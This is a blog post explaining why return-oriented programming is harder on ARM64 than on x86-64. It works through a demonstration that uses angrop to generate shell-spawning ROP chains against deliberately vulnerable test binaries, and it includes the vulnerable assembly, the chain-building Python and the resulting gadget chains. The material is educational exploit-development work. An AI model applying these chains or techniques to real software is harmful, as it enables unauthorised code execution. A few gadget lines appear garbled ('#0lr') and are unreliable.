Return-oriented programming (ROP) is fairly trivial for architectures like x86-64 with stack-based returns which transfer control to a return address located on the stack. However, on ARM64, software can't write directly to the program counter. It can only be updated through branches and exception entries or returns. This makes stack-based returns in the x86-64 sense impossible.
Naturally, this key architectural difference means that the structure of ROP chains differs between x86-64 and ARM64. It also affects the practicality of manually crafting such chains. Instead, it naturally lends itself to using ROP chain generators.
On x86-64, typical ROP gadgets end with a ret
instruction which pops the value from the top of the stack
specified by rsp into the program counter
rip. This makes gadget chaining easy since the stack
pointer, which functions as a quasi program counter, is
automatically advanced to the next gadget on the stack.
Below is a hypothetical stack view of an x86-64 ROP chain that
writes 0xdeadbeef to rdi and
0xfeedface to rsi:
0x0000000000000000: pop, %rdi; ret 0x0000000000000008: 0xdeadbeef 0x0000000000000010: pop, %rsi; ret 0x0000000000000018: 0xfeedfaceHere's how the ROP chain executes:
0x8.pop, %rdi pops 0xdeadbeef into
rdi. Now the stack pointer is at
0x10.ret transfers control to the address at
0x10. Now the stack pointer is at
0x18.pop, %rsi pops 0xfeedface into
rsi. Now the stack pointer is at
0x20.ret transfers control to the address at
0x20. Now the stack pointer is at
0x28On architectures with stack-based returns, ROP chains automatically chain themselves together since the return instruction transfers control to the next gadget on the stack. You just place all your gadgets on the stack, padding where necessary and they execute in that order.
ARM64 has a ret instruction too. However, instead
of writing directly to the program counter pc, it
branches to the link register lr. Simple gadgets still
end with a ret instruction, however, you have to
advance to the next gadget manually by setting lr in
the gadget. Since ret is really just a branch, you can
substitute it with any branch instruction as long as you control
the destination.
Below is a hypothetical stack view of an ARM64 ROP chain that
writes 0xdeadbeef to x0 and
0xfeedface to x1:
0x0000000000000000: ldr x0, [sp]; ldr lr, [sp, #0x8], #0x10; ret 0x0000000000000008: 0xdeadbeef 0x0000000000000010: ldr x1, [sp]; ldr lr, [sp, #0x8], #0x10; ret 0x0000000000000018: 0xfeedface
Here's how the ROP chain executes:
0x8.ldr x0, [sp] loads 0xdeadbeef into
x0.ldr lr, [sp, #0x8], #0x10 loads the value at
0x10 into lr and adds 0x10
to the stack pointer. Now the stack pointer is at
0x18.ret transfers control to the address in
lr.ldr x1, [sp] loads 0xfeedface into
x1.ldr lr, [sp, #0x8], #0x10 loads the value at
0x20 into lr and adds 0x10
to the stack pointer. Now the stack pointer is at
0x28.ret transfers control to the address in
lr.Notice how the gadgets have to manually chain themselves
together. They have to get the address of the next gadget into
lr before ret is executed.
Unfortunately you'll never find gadgets like these in the wild: gadgets which perfectly advance the stack pointer up the stack. The offsets you see here for loads and stores were chosen for simplicity. Usually, you'll find that the stack offsets in loads and stores can be rather large resulting in a larger chain size due to padding.
Normally, I write ROP chains manually. This requires me running
ROPgadget
on relevant binaries and then combing through their gadgets to
build up a chain. This works fine for architectures where you're
likely to find simple gadgets with no side effects or dependencies.
However, these sort of gadgets rarely exist in ARM64 binaries.
Take the glibc on my system for example, a supposed trove of
gadgets. On x86-64, say you wanted to set rdi to a
value. That's no problem, pop rdi; ret exists. Want to
set rsi too? pop rsi; ret exists. On
ARM64, say you want to set x0 to a value. Well you
have ldr x0, [sp, #0x10]; ldp fp, lr, [sp], #0x20;
ret. But then say you want to set x1 too. Now
the gadgets become more constrained. ldr x1, [sp, #0x20]; add
sp, sp, #0xb0; br x16 was literally the nicest gadget I
could find. However, it requires you to control x16 to
continue your chain. So that's yet another gadget you'll have to
find. And what if that gadget requires you to control a different
register? The dependencies just keep on growing.
I wondered if there was a better way to write ROP chains,
something more automated. Like was there an angr but for ROP? A
tool where I could say "here are a a set of gadgets, now find the
sequence of gadgets which result in this state". Well it turns out
that that exact tool exists: angrop.
angrop's made by the same great people who made
angr. It's built on top of angr's
symbolic execution engine, and uses constraint solving for
generating ROP chains. Most importantly, it understands the effects
of gadgets.
I wrote a test programs for x86-64 and ARM64 to test
angrop's ROP chain generation. Each test program was
statically linked with glibc and had a vulnerable function
vuln which called gets with the current
stack frame's base as its argument. I wanted to see if I could
generate a ROP chain which would write "/bin/sh" to
writable memory, and make an execve system call to it.
It's important to note that while the test programs are statically
linked with glibc, they don't include all of glibc's gadgets.
Nevertheless, there'll still be more than enough to play with.
Here's the architecture-independent program:
extern void vuln(); int main() { vuln(); }
Here's the x86-64 vulnerable function:
.global vuln .type vuln, @function vuln: push %rbp mov %rsp, %rbp mov %rbp, %rdi call gets pop %rbp ret .size vuln, .-vuln
And here's the ARM64 vulnerable function:
.global vuln .type vuln, @function vuln: stp fp, lr, [sp, #-16]! mov x0, sp bl gets ldp fp, lr, [sp], #16 ret .size vuln, .-vuln
Each program using angrop typically begins with the
following:
import angr, angrop p = angr.Project("pathname") rop = p.analyses.ROP()
Similar to using angr, the first step is to load a
binary into a project. Then, to use angrop, you need
to instantiate an angrop.ROP object for gadget
finding.
Currently angrop is aware of no gadgets. You can
either search for them in the binary or import them. You'll need to
search for them in the binary at least once. However, since
searching takes a bit of time and there's no gadget cache, you'll
also want to save the gadgets:
rop.find_gadgets() rop.save_gadgets("gadgets")
Now on subsequent runs, you can replace the above lines with:
rop.load_gadgets("gadgets")
With these gadgets you can construct a ROP chain using
angr's symbolic execution engine. angrop
provides helper functions which among other things can set
registers, call functions, and write to memory.
Here's how you'd create the x86-64 ROP chain:
obj = p.loader.main_object segment = next(s for s in obj.segments if s.is_writable) syscall_gadget = next(g for g in rop.syscall_gadgets if g.dstr() == "syscall ; ret ") chain = rop.write_to_mem(segment.vaddr, b"/bin/sh\x00") chain += rop.set_regs(rax=59, rdi=segment.vaddr, rsi=0, rdx=0) chain.add_gadget(syscall_gadget)
And here's how you'd create the ARM64 ROP chain:
obj = p.loader.main_object segment = next(s for s in obj.segments if s.is_writable) syscall_gadget = next(g for g in rop.syscall_gadgets if g.dstr() == "svc #0; ret ") chain = rop.write_to_mem(segment.vaddr, b"/bin/sh\x00") chain += rop.set_regs(x8=221, x0=segment.vaddr, x1=0, x2=0) chain.add_gadget(syscall_gadget)
The above ROP chain generation code will only work if there are
sufficient gadgets to satisfy the ROP chain's constraints. This is
purely dependent on the gadget the ROP gadget finder finds. The
gadget finder class angrop.ROP accepts several
arguments in its constructor to configure the search criteria. I
found that the defaults worked perfectly for x86-64. However, that
wasn't the case with ARM64.
I had to change the instantiation to:
rop = p.analyses.ROP(fast_mode=False, max_block_size=64)
The issue was caused by the default value of the
max_block_size argument which controls the maximum
gadget length in bytes. For x86-64 the default size is 12. This is
fine since x86-64 gadgets aren't typically long and x86-64 has
variable length instructions. For ARM64, the default size is 40.
With a fixed instruction length of 4 bytes, this means a gadget can
contain at must 10 instructions. This may seem like enough, but as
you've seen, ARM64 gadgets aren't pretty: they can be long. And in
glibc, long they are.
I noticed that the gadget finder wasn't able to set
x0 even though such a gadget existed. However, said
gadget was over 10 instructions long! I found that setting the
value to 64 to allow up to 16 instructions was a more reasonable
value that found better, yet more complicated gadgets. I also found
that I had to set fast_mode to false to prevent
max_block_size from being overridden. The only
trade-off of a larger maximum block size was search speed but
that's fine since you only have to search once.
In the end, for both architectures, angrop was able
to successfully generate a ROP chains to pop a shell.
Here's the generated x86-64 ROP chain:
0x0000000000000000: pop %rdi; ret 0x0000000000000008: 0x497f68 0x0000000000000010: pop %rsi; add $0x9340, %eax; ret 0x0000000000000018: 0x68732f6e69622f 0x0000000000000020: mov %rsi, 0x98(%rdi), rsi; ret 0x0000000000000028: pop %rdi; ret 0x0000000000000030: 0x498000 0x0000000000000038: pop %rsi; ret 0x0000000000000040: 0x0 0x0000000000000048: pop %rax; pop %rdx; pop %rbx; ret 0x0000000000000050: 0x3b 0x0000000000000058: 0x0 0x0000000000000060: 0x0 0x0000000000000060: syscall; ret
And here's the ARM64 ROP chain:
0x0000000000000000: ldr x2, [sp, #0x18]; ldp fp, lr, [sp], #0x20; add x0, x0, x2; ret 0x0000000000000008: 0x0 0x0000000000000010: ldr x3, [sp, #0x10]; mov x0, x3; ldp fp, lr, [sp], #0x40; ret 0x0000000000000018: 0x0 0x0000000000000020: 0x48ffd0 0x0000000000000028: 0x0 0x0000000000000030: str x0, [x2, #0lr]; mov w0, #0; ldp fp, lr, [sp], #0x20; ret 0x0000000000000038: 0x68732f6e69622f 0x0000000000000040: 0x0 0x0000000000000048: 0x0 0x0000000000000050: 0x0 0x0000000000000058: 0x0 0x0000000000000060: 0x0 0x0000000000000068: 0x0 0x0000000000000070: ldr x2, [sp, #0x18]; ldp fp, lr, [sp], #0x20; mov x0, x2; ret 0x0000000000000078: 0x0 0x0000000000000080: 0x0 0x0000000000000088: 0x0 0x0000000000000090: mov x16, x0; ldp q0, q1, [sp, #0x50]; ldp q2, q3, [sp, #0x70]; ldp q4, q5, [sp, #0x90]; ldp q6, q7, [sp, #0xb0]; ldp x0, x1, [sp, #0x40]; ldp x2, x3, [sp, #0lr]; ldp x4, x5, [sp, #0x20]; ldp x6, x7, [sp, #0x10]; ldp x8, x9, [sp], #0xd0; ldp x17, lr, [sp], #0x10; br x16 0x0000000000000098: 0x0 0x00000000000000a0: svc #0; ret 0x00000000000000a8: 0xdd 0x00000000000000b0: 0x0 0x00000000000000b8: 0x0 0x00000000000000c0: 0x0 0x00000000000000c8: 0x0 0x00000000000000d0: 0x0 0x00000000000000d8: 0x0 0x00000000000000e0: 0x0 0x00000000000000e8: 0x490000 0x00000000000000f0: 0x0 0x00000000000000f8: 0x0 0x0000000000000100: 0x0 0x0000000000000108: 0x0 0x0000000000000110: 0x0 0x0000000000000118: 0x0 0x0000000000000120: 0x0 0x0000000000000128: 0x0 0x0000000000000130: 0x0 0x0000000000000138: 0x0 0x0000000000000140: 0x0 0x0000000000000148: 0x0 0x0000000000000150: 0x0 0x0000000000000158: 0x0 0x0000000000000160: 0x0 0x0000000000000168: 0x0 0x0000000000000170: 0x0 0x0000000000000178: 0x0 0x0000000000000180: 0x0
Both are impressive, but I was far more impressed by the ARM64
chain. It's faster to just throw it at the binary than attempting
to statically analyze it. I mean, just look at the mammoth gadget
at 0x90! It's like looking at the output of a
compiler. Some things just aren't immediately clear at all. But the
compiler, or in this case angrop, can see right
through it.
I've come to the conclusion that practical ROP is just harder on ARM64 than on x86-64. Now I'm no ROP historian, but maybe the technique was first discovered on an architecture with stack-based returns. I don't know, a part of me just feels like it was made for the x86 architecture family.
So, if you're ever knee-deep in crafting an x86-64 ROP chain and
things are getting a bit hairy, just remember that it could be
worse. Instead, you could be knee-deep crafting an ARM64 ROP chain
without angrop.